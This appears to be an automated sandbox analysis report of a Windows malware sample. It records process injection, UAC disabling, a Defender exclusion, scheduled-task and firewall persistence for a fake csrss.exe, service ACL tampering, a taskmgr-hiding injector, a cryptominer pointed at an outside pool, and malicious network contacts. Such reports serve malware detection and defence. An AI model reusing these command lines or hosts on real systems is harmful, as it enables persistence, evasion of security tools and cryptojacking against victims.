PID 3192 wrote to memory of 760 N/A C:\Users\Admin\AppData\Local\Temp\adffd52446d0d94c4f726205482a0c062248d6eb35948df937336957cf747db8.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe
PID 3192 wrote to memory of 760 N/A C:\Users\Admin\AppData\Local\Temp\adffd52446d0d94c4f726205482a0c062248d6eb35948df937336957cf747db8.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe
PID 3192 wrote to memory of 760 N/A C:\Users\Admin\AppData\Local\Temp\adffd52446d0d94c4f726205482a0c062248d6eb35948df937336957cf747db8.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe
PID 3192 wrote to memory of 760 N/A C:\Users\Admin\AppData\Local\Temp\adffd52446d0d94c4f726205482a0c062248d6eb35948df937336957cf747db8.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe
PID 3192 wrote to memory of 760 N/A C:\Users\Admin\AppData\Local\Temp\adffd52446d0d94c4f726205482a0c062248d6eb35948df937336957cf747db8.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe
PID 3192 wrote to memory of 760 N/A C:\Users\Admin\AppData\Local\Temp\adffd52446d0d94c4f726205482a0c062248d6eb35948df937336957cf747db8.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe
PID 3192 wrote to memory of 760 N/A C:\Users\Admin\AppData\Local\Temp\adffd52446d0d94c4f726205482a0c062248d6eb35948df937336957cf747db8.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe
PID 3192 wrote to memory of 2344 N/A C:\Users\Admin\AppData\Local\Temp\adffd52446d0d94c4f726205482a0c062248d6eb35948df937336957cf747db8.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe
PID 3192 wrote to memory of 2344 N/A C:\Users\Admin\AppData\Local\Temp\adffd52446d0d94c4f726205482a0c062248d6eb35948df937336957cf747db8.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe
PID 3192 wrote to memory of 2344 N/A C:\Users\Admin\AppData\Local\Temp\adffd52446d0d94c4f726205482a0c062248d6eb35948df937336957cf747db8.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe
PID 760 wrote to memory of 2960 N/A C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe C:\Users\Admin\Pictures\FdjdWrURr0pbDSTy4jBjFKsX.exe
PID 760 wrote to memory of 2960 N/A C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe C:\Users\Admin\Pictures\FdjdWrURr0pbDSTy4jBjFKsX.exe
PID 760 wrote to memory of 2960 N/A C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe C:\Users\Admin\Pictures\FdjdWrURr0pbDSTy4jBjFKsX.exe
PID 760 wrote to memory of 2156 N/A C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe C:\Users\Admin\Pictures\VMpmSW5lQOTKnoodNjiG90GW.exe
PID 760 wrote to memory of 2156 N/A C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe C:\Users\Admin\Pictures\VMpmSW5lQOTKnoodNjiG90GW.exe
PID 760 wrote to memory of 2156 N/A C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe C:\Users\Admin\Pictures\VMpmSW5lQOTKnoodNjiG90GW.exe
PID 2960 wrote to memory of 1936 N/A C:\Users\Admin\Pictures\FdjdWrURr0pbDSTy4jBjFKsX.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
PID 2960 wrote to memory of 1936 N/A C:\Users\Admin\Pictures\FdjdWrURr0pbDSTy4jBjFKsX.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
PID 2960 wrote to memory of 1936 N/A C:\Users\Admin\Pictures\FdjdWrURr0pbDSTy4jBjFKsX.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
PID 2960 wrote to memory of 1936 N/A C:\Users\Admin\Pictures\FdjdWrURr0pbDSTy4jBjFKsX.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
PID 2960 wrote to memory of 1936 N/A C:\Users\Admin\Pictures\FdjdWrURr0pbDSTy4jBjFKsX.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
PID 2960 wrote to memory of 1936 N/A C:\Users\Admin\Pictures\FdjdWrURr0pbDSTy4jBjFKsX.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
PID 2960 wrote to memory of 1936 N/A C:\Users\Admin\Pictures\FdjdWrURr0pbDSTy4jBjFKsX.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
PID 2960 wrote to memory of 1936 N/A C:\Users\Admin\Pictures\FdjdWrURr0pbDSTy4jBjFKsX.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
PID 2960 wrote to memory of 1936 N/A C:\Users\Admin\Pictures\FdjdWrURr0pbDSTy4jBjFKsX.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
PID 2960 wrote to memory of 1936 N/A C:\Users\Admin\Pictures\FdjdWrURr0pbDSTy4jBjFKsX.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
PID 2960 wrote to memory of 1936 N/A C:\Users\Admin\Pictures\FdjdWrURr0pbDSTy4jBjFKsX.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
PID 2156 wrote to memory of 2544 N/A C:\Users\Admin\Pictures\VMpmSW5lQOTKnoodNjiG90GW.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 2156 wrote to memory of 2544 N/A C:\Users\Admin\Pictures\VMpmSW5lQOTKnoodNjiG90GW.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 2156 wrote to memory of 2544 N/A C:\Users\Admin\Pictures\VMpmSW5lQOTKnoodNjiG90GW.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 1936 wrote to memory of 2956 N/A C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe C:\Windows\SysWOW64\dialer.exe
PID 1936 wrote to memory of 2956 N/A C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe C:\Windows\SysWOW64\dialer.exe
PID 1936 wrote to memory of 2956 N/A C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe C:\Windows\SysWOW64\dialer.exe
PID 1936 wrote to memory of 2956 N/A C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe C:\Windows\SysWOW64\dialer.exe
PID 1936 wrote to memory of 2956 N/A C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe C:\Windows\SysWOW64\dialer.exe
PID 760 wrote to memory of 4188 N/A C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe C:\Users\Admin\Pictures\ubInWILwqwzq0r3tkzEDMPsx.exe
PID 760 wrote to memory of 4188 N/A C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe C:\Users\Admin\Pictures\ubInWILwqwzq0r3tkzEDMPsx.exe
PID 760 wrote to memory of 4188 N/A C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe C:\Users\Admin\Pictures\ubInWILwqwzq0r3tkzEDMPsx.exe
PID 4188 wrote to memory of 5116 N/A C:\Users\Admin\Pictures\ubInWILwqwzq0r3tkzEDMPsx.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 4188 wrote to memory of 5116 N/A C:\Users\Admin\Pictures\ubInWILwqwzq0r3tkzEDMPsx.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 4188 wrote to memory of 5116 N/A C:\Users\Admin\Pictures\ubInWILwqwzq0r3tkzEDMPsx.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 760 wrote to memory of 4648 N/A C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe C:\Users\Admin\Pictures\SkWMGGpeI3TJBXP1ZRAyaf4U.exe
PID 760 wrote to memory of 4648 N/A C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe C:\Users\Admin\Pictures\SkWMGGpeI3TJBXP1ZRAyaf4U.exe
PID 760 wrote to memory of 4648 N/A C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe C:\Users\Admin\Pictures\SkWMGGpeI3TJBXP1ZRAyaf4U.exe
PID 760 wrote to memory of 3468 N/A C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe C:\Users\Admin\Pictures\3XJHnNSbGYA02GO7UhIuxYV7.exe
PID 760 wrote to memory of 3468 N/A C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe C:\Users\Admin\Pictures\3XJHnNSbGYA02GO7UhIuxYV7.exe
PID 760 wrote to memory of 3468 N/A C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe C:\Users\Admin\Pictures\3XJHnNSbGYA02GO7UhIuxYV7.exe
PID 3468 wrote to memory of 2116 N/A C:\Users\Admin\Pictures\3XJHnNSbGYA02GO7UhIuxYV7.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 3468 wrote to memory of 2116 N/A C:\Users\Admin\Pictures\3XJHnNSbGYA02GO7UhIuxYV7.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 3468 wrote to memory of 2116 N/A C:\Users\Admin\Pictures\3XJHnNSbGYA02GO7UhIuxYV7.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 760 wrote to memory of 3616 N/A C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe C:\Users\Admin\Pictures\YpBqfcPhJaYRxzNaLOsZMlvh.exe
PID 760 wrote to memory of 3616 N/A C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe C:\Users\Admin\Pictures\YpBqfcPhJaYRxzNaLOsZMlvh.exe
PID 760 wrote to memory of 3616 N/A C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe C:\Users\Admin\Pictures\YpBqfcPhJaYRxzNaLOsZMlvh.exe
PID 3616 wrote to memory of 2272 N/A C:\Users\Admin\Pictures\YpBqfcPhJaYRxzNaLOsZMlvh.exe C:\Users\Admin\AppData\Local\Temp\u2sg.0.exe
PID 3616 wrote to memory of 2272 N/A C:\Users\Admin\Pictures\YpBqfcPhJaYRxzNaLOsZMlvh.exe C:\Users\Admin\AppData\Local\Temp\u2sg.0.exe
PID 3616 wrote to memory of 2272 N/A C:\Users\Admin\Pictures\YpBqfcPhJaYRxzNaLOsZMlvh.exe C:\Users\Admin\AppData\Local\Temp\u2sg.0.exe
PID 3616 wrote to memory of 2008 N/A C:\Users\Admin\Pictures\YpBqfcPhJaYRxzNaLOsZMlvh.exe C:\Users\Admin\AppData\Local\Temp\u2sg.1.exe
PID 3616 wrote to memory of 2008 N/A C:\Users\Admin\Pictures\YpBqfcPhJaYRxzNaLOsZMlvh.exe C:\Users\Admin\AppData\Local\Temp\u2sg.1.exe

System policy modification

evasion
Description Indicator Process Target
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" C:\Users\Admin\AppData\Local\Temp\adffd52446d0d94c4f726205482a0c062248d6eb35948df937336957cf747db8.exe N/A

Uses Task Scheduler COM API

persistence

Processes

c:\windows\system32\sihost.exe

sihost.exe

C:\Users\Admin\AppData\Local\Temp\adffd52446d0d94c4f726205482a0c062248d6eb35948df937336957cf747db8.exe

"C:\Users\Admin\AppData\Local\Temp\adffd52446d0d94c4f726205482a0c062248d6eb35948df937336957cf747db8.exe"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Local\Temp\adffd52446d0d94c4f726205482a0c062248d6eb35948df937336957cf747db8.exe" -Force

C:\Windows\Microsoft.NET\Framework\v4.0.30319\regsvcs.exe

"C:\Windows\Microsoft.NET\Framework\v4.0.30319\regsvcs.exe"

C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe

"C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe"

C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe

"C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe"

C:\Users\Admin\Pictures\FdjdWrURr0pbDSTy4jBjFKsX.exe

"C:\Users\Admin\Pictures\FdjdWrURr0pbDSTy4jBjFKsX.exe"

C:\Users\Admin\Pictures\VMpmSW5lQOTKnoodNjiG90GW.exe

"C:\Users\Admin\Pictures\VMpmSW5lQOTKnoodNjiG90GW.exe"

C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 2960 -s 844

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

powershell -nologo -noprofile

C:\Windows\SysWOW64\dialer.exe

"C:\Windows\system32\dialer.exe"

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 1936 -s 636

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 1936 -s 644

C:\Users\Admin\Pictures\ubInWILwqwzq0r3tkzEDMPsx.exe

"C:\Users\Admin\Pictures\ubInWILwqwzq0r3tkzEDMPsx.exe"

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

powershell -nologo -noprofile

C:\Users\Admin\Pictures\SkWMGGpeI3TJBXP1ZRAyaf4U.exe

"C:\Users\Admin\Pictures\SkWMGGpeI3TJBXP1ZRAyaf4U.exe"

C:\Users\Admin\Pictures\3XJHnNSbGYA02GO7UhIuxYV7.exe

"C:\Users\Admin\Pictures\3XJHnNSbGYA02GO7UhIuxYV7.exe"

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

powershell -nologo -noprofile

C:\Users\Admin\Pictures\YpBqfcPhJaYRxzNaLOsZMlvh.exe

"C:\Users\Admin\Pictures\YpBqfcPhJaYRxzNaLOsZMlvh.exe"

C:\Users\Admin\AppData\Local\Temp\u2sg.0.exe

"C:\Users\Admin\AppData\Local\Temp\u2sg.0.exe"

C:\Users\Admin\AppData\Local\Temp\u2sg.1.exe

"C:\Users\Admin\AppData\Local\Temp\u2sg.1.exe"

C:\Users\Admin\Pictures\VMpmSW5lQOTKnoodNjiG90GW.exe

"C:\Users\Admin\Pictures\VMpmSW5lQOTKnoodNjiG90GW.exe"

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

powershell -nologo -noprofile

C:\Users\Admin\Pictures\ubInWILwqwzq0r3tkzEDMPsx.exe

"C:\Users\Admin\Pictures\ubInWILwqwzq0r3tkzEDMPsx.exe"

C:\Users\Admin\Pictures\3XJHnNSbGYA02GO7UhIuxYV7.exe

"C:\Users\Admin\Pictures\3XJHnNSbGYA02GO7UhIuxYV7.exe"

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

powershell -nologo -noprofile

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

powershell -nologo -noprofile

C:\Windows\System32\cmd.exe

C:\Windows\Sysnative\cmd.exe /C "netsh advfirewall firewall add rule name="csrss" dir=in action=allow program="C:\Windows\rss\csrss.exe" enable=yes"

C:\Windows\system32\netsh.exe

netsh advfirewall firewall add rule name="csrss" dir=in action=allow program="C:\Windows\rss\csrss.exe" enable=yes

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

powershell -nologo -noprofile

C:\Users\Admin\Pictures\PHdHLeuB5m5LNlcNnVsyRe83.exe

"C:\Users\Admin\Pictures\PHdHLeuB5m5LNlcNnVsyRe83.exe" --silent --allusers=0

C:\Users\Admin\Pictures\PHdHLeuB5m5LNlcNnVsyRe83.exe

C:\Users\Admin\Pictures\PHdHLeuB5m5LNlcNnVsyRe83.exe --type=crashpad-handler /prefetch:4 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Roaming\Opera Software\Opera Stable\Crash Reports" "--crash-count-file=C:\Users\Admin\AppData\Roaming\Opera Software\Opera Stable\crash_count.txt" --url=https://crashstats-collector.opera.com/collector/submit --annotation=channel=Stable --annotation=plat=Win32 --annotation=prod=OperaDesktop --annotation=ver=109.0.5097.35 --initial-client-data=0x2a0,0x2a4,0x2a8,0x27c,0x2ac,0x6d14e1d0,0x6d14e1dc,0x6d14e1e8

C:\Users\Admin\AppData\Local\Temp\.opera\Opera Installer Temp\PHdHLeuB5m5LNlcNnVsyRe83.exe

"C:\Users\Admin\AppData\Local\Temp\.opera\Opera Installer Temp\PHdHLeuB5m5LNlcNnVsyRe83.exe" --version

C:\Users\Admin\Pictures\PHdHLeuB5m5LNlcNnVsyRe83.exe

"C:\Users\Admin\Pictures\PHdHLeuB5m5LNlcNnVsyRe83.exe" --backend --install --import-browser-data=0 --enable-stats=1 --enable-installer-stats=1 --consent-given=0 --general-interests=0 --general-location=0 --personalized-content=0 --personalized-ads=0 --launchopera=1 --installfolder="C:\Users\Admin\AppData\Local\Programs\Opera" --profile-folder --language=en --singleprofile=0 --copyonly=0 --allusers=0 --setdefaultbrowser=1 --pintotaskbar=1 --pintostartmenu=1 --run-at-startup=1 --show-intro-overlay --server-tracking-data=server_tracking_data --initial-pid=3896 --package-dir-prefix="C:\Users\Admin\AppData\Local\Temp\.opera\Opera Installer Temp\opera_package_20240329015451" --session-guid=6fbf4717-c4c0-46ce-ae1c-54af9d7fbeb1 --server-tracking-blob=NWRhZGZhOTNlYjEwZDhjNzA1NzI1NzU5Mjk0ZDgzMTY2MmM1YmNjYjQ4YTYwZDQyNWJlZTVmNTRmMGVkZjY2NDp7ImNvdW50cnkiOiJHQiIsImluc3RhbGxlcl9uYW1lIjoiT3BlcmFTZXR1cC5leGUiLCJwcm9kdWN0Ijp7Im5hbWUiOiJvcGVyYSJ9LCJxdWVyeSI6Ii9vcGVyYS9zdGFibGUvd2luZG93cy8/dXRtX21lZGl1bT1hcGImdXRtX3NvdXJjZT1ta3QmdXRtX2NhbXBhaWduPTc2N180NTYiLCJzeXN0ZW0iOnsicGxhdGZvcm0iOnsiYXJjaCI6Ing4Nl82NCIsIm9wc3lzIjoiV2luZG93cyIsIm9wc3lzLXZlcnNpb24iOiIxMCIsInBhY2thZ2UiOiJFWEUifX0sInRpbWVzdGFtcCI6IjE3MTE2NzcyMzIuNzY3NiIsInV0bSI6eyJjYW1wYWlnbiI6Ijc2N180NTYiLCJtZWRpdW0iOiJhcGIiLCJzb3VyY2UiOiJta3QifSwidXVpZCI6ImUyMjRjMDVhLTlmZDAtNGFlYy05YzhmLTI2NWRjYzM4NjFkMSJ9 --silent --desktopshortcut=1 --wait-for-package --initial-proc-handle=4C04000000000000

C:\Users\Admin\Pictures\PHdHLeuB5m5LNlcNnVsyRe83.exe

C:\Users\Admin\Pictures\PHdHLeuB5m5LNlcNnVsyRe83.exe --type=crashpad-handler /prefetch:4 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Roaming\Opera Software\Opera Stable\Crash Reports" "--crash-count-file=C:\Users\Admin\AppData\Roaming\Opera Software\Opera Stable\crash_count.txt" --url=https://crashstats-collector.opera.com/collector/submit --annotation=channel=Stable --annotation=plat=Win32 --annotation=prod=OperaDesktop --annotation=ver=109.0.5097.35 --initial-client-data=0x2ac,0x2b0,0x2b4,0x27c,0x2b8,0x6c7ce1d0,0x6c7ce1dc,0x6c7ce1e8

C:\Windows\System32\cmd.exe

C:\Windows\Sysnative\cmd.exe /C "netsh advfirewall firewall add rule name="csrss" dir=in action=allow program="C:\Windows\rss\csrss.exe" enable=yes"

C:\Windows\System32\cmd.exe

C:\Windows\Sysnative\cmd.exe /C "netsh advfirewall firewall add rule name="csrss" dir=in action=allow program="C:\Windows\rss\csrss.exe" enable=yes"

C:\Windows\system32\netsh.exe

netsh advfirewall firewall add rule name="csrss" dir=in action=allow program="C:\Windows\rss\csrss.exe" enable=yes

C:\Windows\system32\netsh.exe

netsh advfirewall firewall add rule name="csrss" dir=in action=allow program="C:\Windows\rss\csrss.exe" enable=yes

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

powershell -nologo -noprofile

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

powershell -nologo -noprofile

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

powershell -nologo -noprofile

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

powershell -nologo -noprofile

C:\Users\Admin\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe

"C:\Users\Admin\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe" /eieci=11A12794-499E-4FA0-A281-A9A9AA8B2685 /eipi=5488CB36-BE62-4606-B07B-2EE938868BD1

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

powershell -nologo -noprofile

C:\Windows\rss\csrss.exe

C:\Windows\rss\csrss.exe

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

powershell -nologo -noprofile

C:\Windows\SYSTEM32\schtasks.exe

schtasks /CREATE /SC ONLOGON /RL HIGHEST /TR "C:\Windows\rss\csrss.exe" /TN csrss /F

C:\Windows\SYSTEM32\schtasks.exe

schtasks /delete /tn ScheduledUpdate /f

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

powershell -nologo -noprofile

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

powershell -nologo -noprofile

C:\Users\Admin\AppData\Local\Temp\csrss\injector\injector.exe

C:\Users\Admin\AppData\Local\Temp\csrss\injector\injector.exe taskmgr.exe C:\Users\Admin\AppData\Local\Temp\csrss\injector\NtQuerySystemInformationHook.dll

C:\Windows\SYSTEM32\schtasks.exe

schtasks /CREATE /SC ONLOGON /RL HIGHEST /TR "C:\Windows\rss\csrss.exe" /TN csrss /F

C:\Windows\windefender.exe

"C:\Windows\windefender.exe"

C:\Windows\SysWOW64\cmd.exe

cmd.exe /C sc sdset WinDefender D:(A;;CCLCSWRPWPDTLOCRRC;;;SY)(A;;CCDCLCSWRPLOCRSDRCWDWO;;;BA)(D;;WPDT;;;BA)(A;;CCLCSWLOCRRC;;;IU)(A;;CCLCSWLOCRRC;;;SU)S:(AU;FA;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;WD)

C:\Windows\SysWOW64\sc.exe

sc sdset WinDefender D:(A;;CCLCSWRPWPDTLOCRRC;;;SY)(A;;CCDCLCSWRPLOCRSDRCWDWO;;;BA)(D;;WPDT;;;BA)(A;;CCLCSWLOCRRC;;;IU)(A;;CCLCSWLOCRRC;;;SU)S:(AU;FA;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;WD)

C:\Windows\windefender.exe

C:\Windows\windefender.exe

C:\Windows\SysWOW64\cmd.exe

"C:\Windows\system32\cmd.exe" /c start "" "C:\Users\Admin\AppData\Local\Temp\GCGCBAECFC.exe"

C:\Users\Admin\AppData\Local\Temp\GCGCBAECFC.exe

"C:\Users\Admin\AppData\Local\Temp\GCGCBAECFC.exe"

C:\Windows\SysWOW64\cmd.exe

"C:\Windows\System32\cmd.exe" /C ping 2.2.2.2 -n 1 -w 3000 > Nul & Del C:\Users\Admin\AppData\Local\Temp\GCGCBAECFC.exe

C:\Windows\SysWOW64\PING.EXE

ping 2.2.2.2 -n 1 -w 3000

C:\Users\Admin\AppData\Local\Temp\.opera\Opera Installer Temp\opera_package_202403290154511\assistant\Assistant_108.0.5067.20_Setup.exe_sfx.exe

"C:\Users\Admin\AppData\Local\Temp\.opera\Opera Installer Temp\opera_package_202403290154511\assistant\Assistant_108.0.5067.20_Setup.exe_sfx.exe"

C:\Users\Admin\AppData\Local\Temp\.opera\Opera Installer Temp\opera_package_202403290154511\assistant\assistant_installer.exe

"C:\Users\Admin\AppData\Local\Temp\.opera\Opera Installer Temp\opera_package_202403290154511\assistant\assistant_installer.exe" --version

C:\Users\Admin\AppData\Local\Temp\.opera\Opera Installer Temp\opera_package_202403290154511\assistant\assistant_installer.exe

"C:\Users\Admin\AppData\Local\Temp\.opera\Opera Installer Temp\opera_package_202403290154511\assistant\assistant_installer.exe" --type=crashpad-handler /prefetch:4 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Roaming\Opera Software\Opera Stable\Crash Reports" "--crash-count-file=C:\Users\Admin\AppData\Roaming\Opera Software\Opera Stable\crash_count.txt" --url=https://crashstats-collector.opera.com/collector/submit --annotation=channel=Stable --annotation=plat=Win32 --annotation=prod=OperaDesktop --annotation=ver=108.0.5067.20 --initial-client-data=0x248,0x24c,0x250,0x224,0x254,0x300040,0x30004c,0x300058

C:\Users\Admin\Pictures\uSEC49v5Ra5WAKyOQGf1eIdn.exe

"C:\Users\Admin\Pictures\uSEC49v5Ra5WAKyOQGf1eIdn.exe"

\??\c:\windows\system32\svchost.exe

c:\windows\system32\svchost.exe -k localsystemnetworkrestricted -s fhsvc

C:\Windows\system32\svchost.exe

C:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted -s WPDBusEnum

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

powershell -nologo -noprofile

C:\Users\Admin\AppData\Local\Temp\csrss\dcb505dc2b9d8aac05f4ca0727f5eadb.exe

C:\Users\Admin\AppData\Local\Temp\csrss\dcb505dc2b9d8aac05f4ca0727f5eadb.exe -xor=soothai2Aep2ohqu -m=https://cdn.discordapp.com/attachments/1220770485210710117/1220772642102054933/wVPjYUIbfZQwJs?ex=6610281e&is=65fdb31e&hm=ab675d89d9dcb78c3c9e04e8416260f60c6fc5d8ddedcab3944fe161191bb8b7& -pool tls://showlock.net:40001 -pool tls://showlock.net:443 -pool tcp://showlock.net:80

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

powershell -nologo -noprofile

C:\Users\Admin\AppData\Local\Temp\csrss\wup\xarch\wup.exe

C:\Users\Admin\AppData\Local\Temp\csrss\wup\xarch\wup.exe -o showlock.net:40001 --rig-id 4850dfb6-954d-44e6-b05f-b6e92b21bbd9 --tls --nicehash -o showlock.net:443 --rig-id 4850dfb6-954d-44e6-b05f-b6e92b21bbd9 --tls --nicehash -o showlock.net:80 --rig-id 4850dfb6-954d-44e6-b05f-b6e92b21bbd9 --nicehash --http-port 3433 --http-access-token 4850dfb6-954d-44e6-b05f-b6e92b21bbd9 --randomx-wrmsr=-1

C:\Windows\rss\csrss.exe

C:\Windows\rss\csrss.exe -hide 244

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

powershell -nologo -noprofile

C:\Users\Admin\AppData\Local\Temp\csrss\713674d5e968cbe2102394be0b2bae6f.exe

C:\Users\Admin\AppData\Local\Temp\csrss\713674d5e968cbe2102394be0b2bae6f.exe

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

powershell -nologo -noprofile

Network

Country Destination Domain Proto
US 8.8.8.8:53 pastebin.com udp
US 8.8.8.8:53 yip.su udp
US 104.20.68.143:443 pastebin.com tcp
US 172.67.169.89:443 yip.su tcp
DE 185.172.128.144:80 185.172.128.144 tcp
US 8.8.8.8:53 piramidglobaltobacco.id udp
US 8.8.8.8:53 shipofdestiny.com udp
AT 5.42.64.17:80 5.42.64.17 tcp
US 104.21.32.142:443 shipofdestiny.com tcp
SG 217.21.73.190:443 piramidglobaltobacco.id tcp
US 8.8.8.8:53 sty.ink udp
US 8.8.8.8:53 operandotwo.com udp
US 104.21.32.142:443 shipofdestiny.com tcp
US 8.8.8.8:53 namemail.org udp
US 8.8.8.8:53 cu82342.tw1.ru udp
US 8.8.8.8:53 net.geo.opera.com udp
NL 185.26.182.112:80 net.geo.opera.com tcp
RU 176.57.210.144:443 cu82342.tw1.ru tcp
US 8.8.8.8:53 143.68.20.104.in-addr.arpa udp
US 8.8.8.8:53 89.169.67.172.in-addr.arpa udp
US 8.8.8.8:53 142.32.21.104.in-addr.arpa udp
US 8.8.8.8:53 17.64.42.5.in-addr.arpa udp
US 8.8.8.8:53 lawyerbuyer.org udp
US 104.21.63.71:443 lawyerbuyer.org tcp
US 104.21.15.5:443 operandotwo.com tcp
US 8.8.8.8:53 144.210.57.176.in-addr.arpa udp
US 8.8.8.8:53 190.73.21.217.in-addr.arpa udp
US 8.8.8.8:53 71.63.21.104.in-addr.arpa udp
US 8.8.8.8:53 guseman.org udp
US 172.67.173.167:443 guseman.org tcp
US 172.67.200.219:443 sty.ink tcp
US 172.67.200.219:443 sty.ink tcp
US 8.8.8.8:53 5.15.21.104.in-addr.arpa udp
US 8.8.8.8:53 219.200.67.172.in-addr.arpa udp
NL 185.26.182.112:443 net.geo.opera.com tcp
US 8.8.8.8:53 112.182.26.185.in-addr.arpa udp
US 8.8.8.8:53 241.110.86.104.in-addr.arpa udp
US 8.8.8.8:53 167.173.67.172.in-addr.arpa udp
US 8.8.8.8:53 herdbescuitinjurywu.shop udp
US 172.67.206.194:443 herdbescuitinjurywu.shop tcp
